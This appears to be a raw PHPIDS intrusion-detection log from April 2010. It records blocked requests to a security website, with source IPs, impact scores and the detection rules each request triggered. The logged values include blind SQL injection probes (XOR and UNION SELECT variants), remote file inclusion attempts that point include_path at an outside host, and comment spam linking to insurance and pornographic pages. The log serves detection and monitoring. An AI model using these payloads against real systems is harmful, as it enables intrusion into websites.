Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-21 14:15:02
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122138
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-21 14:15:02
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122135
Name:REQUEST.page
Value:''
Page:/i.php?page=''
IP:208.80.193.29
Impact:12
Created:2010-04-21 14:02:14
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122136
Name:GET.page
Value:''
Page:/i.php?page=''
IP:208.80.193.29
Impact:12
Created:2010-04-21 14:02:14
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122133
Name:REQUEST.codeme
Value:It is a very good thing, <a href= http://cheapcaliforniaautoinsurance.tumblr.com/#1 >cheap california auto insurance</a> [url=http://cheapcaliforniaautoinsurance.tumblr.com/#1]cheap california auto insurance[/url], 8303,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 13:45:42
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122134
Name:POST.codeme
Value:It is a very good thing, <a href= http://cheapcaliforniaautoinsurance.tumblr.com/#1 >cheap california auto insurance</a> [url=http://cheapcaliforniaautoinsurance.tumblr.com/#1]cheap california auto insurance[/url], 8303,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 13:45:42
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122131
Name:REQUEST.codeme
Value:Give somebody the to a site about the, <a href= http://automobileinsurancerules.tumblr.com/#1 >automobile insurance rules for you</a> [url=http://automobileinsurancerules.tumblr.com/#1]automobile insurance rules for you[/url], asid,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 13:22:31
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122132
Name:POST.codeme
Value:Give somebody the to a site about the, <a href= http://automobileinsurancerules.tumblr.com/#1 >automobile insurance rules for you</a> [url=http://automobileinsurancerules.tumblr.com/#1]automobile insurance rules for you[/url], asid,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 13:22:31
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122129
Name:REQUEST.codeme
Value:Your Site Is Great, <a href= http://howmuchdoeslifeinsurancecost.tumblr.com/ >how much does life insurance cost</a>, [url= http://howmuchdoeslifeinsurancecost.tumblr.com/ ]how much does life insurance cost[/url], >:-]],
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-21 12:43:25
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122130
Name:POST.codeme
Value:Your Site Is Great, <a href= http://howmuchdoeslifeinsurancecost.tumblr.com/ >how much does life insurance cost</a>, [url= http://howmuchdoeslifeinsurancecost.tumblr.com/ ]how much does life insurance cost[/url], >:-]],
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-21 12:43:25
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122127
Name:REQUEST.codeme
Value:Best, <a href= http://rentersinsurances.tumblr.com/#1 >Discount renters insurance</a> [url=http://rentersinsurances.tumblr.com/#1]Discount renters insurance[/url], 8D,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 12:03:58
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122128
Name:POST.codeme
Value:Best, <a href= http://rentersinsurances.tumblr.com/#1 >Discount renters insurance</a> [url=http://rentersinsurances.tumblr.com/#1]Discount renters insurance[/url], 8D,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 12:03:58
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122125
Name:REQUEST.page
Value:security/phpids-install-notes aNd 0=1 uNioN alL sEleCT
Page:/i.php?page=security/phpids-install-notes+aNd+0=1+uNioN+alL+sEleCT+
IP:109.231.69.70
Impact:20
Created:2010-04-21 11:51:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122126
Name:GET.page
Value:security/phpids-install-notes aNd 0=1 uNioN alL sEleCT
Page:/i.php?page=security/phpids-install-notes+aNd+0=1+uNioN+alL+sEleCT+
IP:109.231.69.70
Impact:20
Created:2010-04-21 11:51:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122123
Name:REQUEST.page
Value:security/localsamcrack2 aNd 0=1 uNioN alL sEleCT
Page:/i.php?page=security/localsamcrack2+aNd+0=1+uNioN+alL+sEleCT+
IP:109.231.69.70
Impact:20
Created:2010-04-21 11:51:30
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122124
Name:GET.page
Value:security/localsamcrack2 aNd 0=1 uNioN alL sEleCT
Page:/i.php?page=security/localsamcrack2+aNd+0=1+uNioN+alL+sEleCT+
IP:109.231.69.70
Impact:20
Created:2010-04-21 11:51:30
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122121
Name:REQUEST.page
Value:doomsday/nuclear-war-survival"%20rel="nofollow">
Page:/i.php?page=doomsday/nuclear-war-survival%22%2520rel=%22nofollow%22%3e
IP:67.195.111.36
Impact:42
Created:2010-04-21 11:44:21
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122122
Name:GET.page
Value:doomsday/nuclear-war-survival"%20rel="nofollow">
Page:/i.php?page=doomsday/nuclear-war-survival%22%2520rel=%22nofollow%22%3e
IP:67.195.111.36
Impact:42
Created:2010-04-21 11:44:21
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122119
Name:REQUEST.codeme
Value:Very interesting sites., <a href= http://vernetroyersextape.tumblr.com/#1 >verne troyer sex tape information</a> [url=http://vernetroyersextape.tumblr.com/#1]verne troyer sex tape information[/url], upr,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 09:26:35
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122120
Name:POST.codeme
Value:Very interesting sites., <a href= http://vernetroyersextape.tumblr.com/#1 >verne troyer sex tape information</a> [url=http://vernetroyersextape.tumblr.com/#1]verne troyer sex tape information[/url], upr,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 09:26:35
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122115
Name:REQUEST.page
Value:security//?include_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security//?include_path=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:26
Created:2010-04-21 09:25:15
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122116
Name:GET.page
Value:security//?include_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security//?include_path=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:26
Created:2010-04-21 09:25:15
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122117
Name:REQUEST.page
Value:security/ettercapfilter//?include_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/ettercapfilter//?include_path=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:26
Created:2010-04-21 09:25:15
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122118
Name:GET.page
Value:security/ettercapfilter//?include_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/ettercapfilter//?include_path=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:26
Created:2010-04-21 09:25:15
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122111
Name:REQUEST.page
Value:security//?include_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security//?include_path=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:26
Created:2010-04-21 09:25:13
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122112
Name:GET.page
Value:security//?include_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security//?include_path=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:26
Created:2010-04-21 09:25:13
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122113
Name:REQUEST.page
Value:security/ettercapfilter//?include_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/ettercapfilter//?include_path=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:26
Created:2010-04-21 09:25:13
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122114
Name:GET.page
Value:security/ettercapfilter//?include_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/ettercapfilter//?include_path=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:26
Created:2010-04-21 09:25:13
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122107
Name:REQUEST.page
Value:security//?include_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security//?include_path=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:26
Created:2010-04-21 09:24:17
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122108
Name:GET.page
Value:security//?include_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security//?include_path=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:26
Created:2010-04-21 09:24:17
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122109
Name:REQUEST.page
Value:security/detect-tor-exit-node-in-php //?include_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/detect-tor-exit-node-in-php%20%20//?include_path=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:26
Created:2010-04-21 09:24:17
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122110
Name:GET.page
Value:security/detect-tor-exit-node-in-php //?include_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/detect-tor-exit-node-in-php%20%20//?include_path=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:26
Created:2010-04-21 09:24:17
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122103
Name:REQUEST.page
Value:security/detect-tor-exit-node-in-php //?include_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/detect-tor-exit-node-in-php%20%20//?include_path=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:26
Created:2010-04-21 09:24:14
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122104
Name:REQUEST.page
Value:security//?include_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security//?include_path=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:26
Created:2010-04-21 09:24:14
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122105
Name:GET.page
Value:security/detect-tor-exit-node-in-php //?include_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/detect-tor-exit-node-in-php%20%20//?include_path=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:26
Created:2010-04-21 09:24:14
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122106
Name:GET.page
Value:security//?include_path=http://phamsight.com/docs/images/head??
Page:/i.php?page=security//?include_path=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:26
Created:2010-04-21 09:24:14
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122099
Name:REQUEST.WibiyaProfile
Value:{"toolbar":{"stat":"Max"},"apps":{"openApps":{}}}
Page:/i.php?page=security/kon-boot-from-usb
IP:65.55.215.168
Impact:64
Created:2010-04-21 09:15:52
Details:
Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID: 8
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects basic SQL authentication bypass attempts 3/3 | Tags: sqli, id, lfi | ID: 46
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 1.5384615384615

ID:122100
Name:REQUEST.WibiyaProfile
Value:{"toolbar":{"stat":"Max"},"apps":{"openApps":{}}}
Page:/i.php?page=security/kon-boot-from-usb
IP:65.55.218.36
Impact:64
Created:2010-04-21 09:15:52
Details:
Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID: 8
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects basic SQL authentication bypass attempts 3/3 | Tags: sqli, id, lfi | ID: 46
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 1.5384615384615

ID:122101
Name:COOKIE.WibiyaProfile
Value:{"toolbar":{"stat":"Max"},"apps":{"openApps":{}}}
Page:/i.php?page=security/kon-boot-from-usb
IP:65.55.218.36
Impact:64
Created:2010-04-21 09:15:52
Details:
Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID: 8
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects basic SQL authentication bypass attempts 3/3 | Tags: sqli, id, lfi | ID: 46
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 1.5384615384615

ID:122102
Name:COOKIE.WibiyaProfile
Value:{"toolbar":{"stat":"Max"},"apps":{"openApps":{}}}
Page:/i.php?page=security/kon-boot-from-usb
IP:65.55.215.168
Impact:64
Created:2010-04-21 09:15:52
Details:
Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID: 8
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects basic SQL authentication bypass attempts 3/3 | Tags: sqli, id, lfi | ID: 46
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 1.5384615384615

ID:122097
Name:REQUEST.codeme
Value:Best Wishes, <a href= http://herfirstanalsex.tumblr.com/ >her first anal sex for you</a>, [url= http://herfirstanalsex.tumblr.com/ ]her first anal sex for you[/url], 10166,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-21 08:47:04
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122098
Name:POST.codeme
Value:Best Wishes, <a href= http://herfirstanalsex.tumblr.com/ >her first anal sex for you</a>, [url= http://herfirstanalsex.tumblr.com/ ]her first anal sex for you[/url], 10166,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-21 08:47:04
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:122095
Name:REQUEST.page
Value:videos/universal-plug-and-play-upnp-1[/url]
Page:/i.php?page=videos/universal-plug-and-play-upnp-1[/url]
IP:67.195.111.36
Impact:8
Created:2010-04-21 08:11:35
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20

ID:122096
Name:GET.page
Value:videos/universal-plug-and-play-upnp-1[/url]
Page:/i.php?page=videos/universal-plug-and-play-upnp-1[/url]
IP:67.195.111.36
Impact:8
Created:2010-04-21 08:11:35
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20

ID:122093
Name:REQUEST.page
Value:zaurusmain?lastverified=07-MAR-2004
Page:/i.php?submenu=zaurusheader&page=zaurusmain?lastverified=07-MAR-2004
IP:67.195.111.36
Impact:10
Created:2010-04-21 07:41:05
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122094
Name:GET.page
Value:zaurusmain?lastverified=07-MAR-2004
Page:/i.php?submenu=zaurusheader&page=zaurusmain?lastverified=07-MAR-2004
IP:67.195.111.36
Impact:10
Created:2010-04-21 07:41:05
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122091
Name:REQUEST.page
Value:security/?page=security/hackingillustrated'/**/XoR/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%278
IP:120.7.241.161
Impact:66
Created:2010-04-21 07:37:18
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122092
Name:GET.page
Value:security/?page=security/hackingillustrated'/**/XoR/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%278
IP:120.7.241.161
Impact:66
Created:2010-04-21 07:37:18
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122089
Name:REQUEST.page
Value:security/?page=security/hackingillustrated'/**/XoR/**/'8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%273
IP:120.7.241.161
Impact:66
Created:2010-04-21 07:37:17
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122090
Name:GET.page
Value:security/?page=security/hackingillustrated'/**/XoR/**/'8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%273
IP:120.7.241.161
Impact:66
Created:2010-04-21 07:37:17
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122087
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' XoR '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%278
IP:120.7.241.161
Impact:38
Created:2010-04-21 07:37:15
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122088
Name:GET.page
Value:security/?page=security/hackingillustrated' XoR '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%278
IP:120.7.241.161
Impact:38
Created:2010-04-21 07:37:15
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122085
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' XoR '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%273
IP:120.7.241.161
Impact:38
Created:2010-04-21 07:37:12
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122086
Name:GET.page
Value:security/?page=security/hackingillustrated' XoR '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%273
IP:120.7.241.161
Impact:38
Created:2010-04-21 07:37:12
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122083
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' XoR '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%278
IP:120.7.241.161
Impact:38
Created:2010-04-21 07:37:10
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122084
Name:GET.page
Value:security/?page=security/hackingillustrated' XoR '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%278
IP:120.7.241.161
Impact:38
Created:2010-04-21 07:37:10
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122081
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' XoR '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%273
IP:120.7.241.161
Impact:38
Created:2010-04-21 07:37:07
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122082
Name:GET.page
Value:security/?page=security/hackingillustrated' XoR '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%273
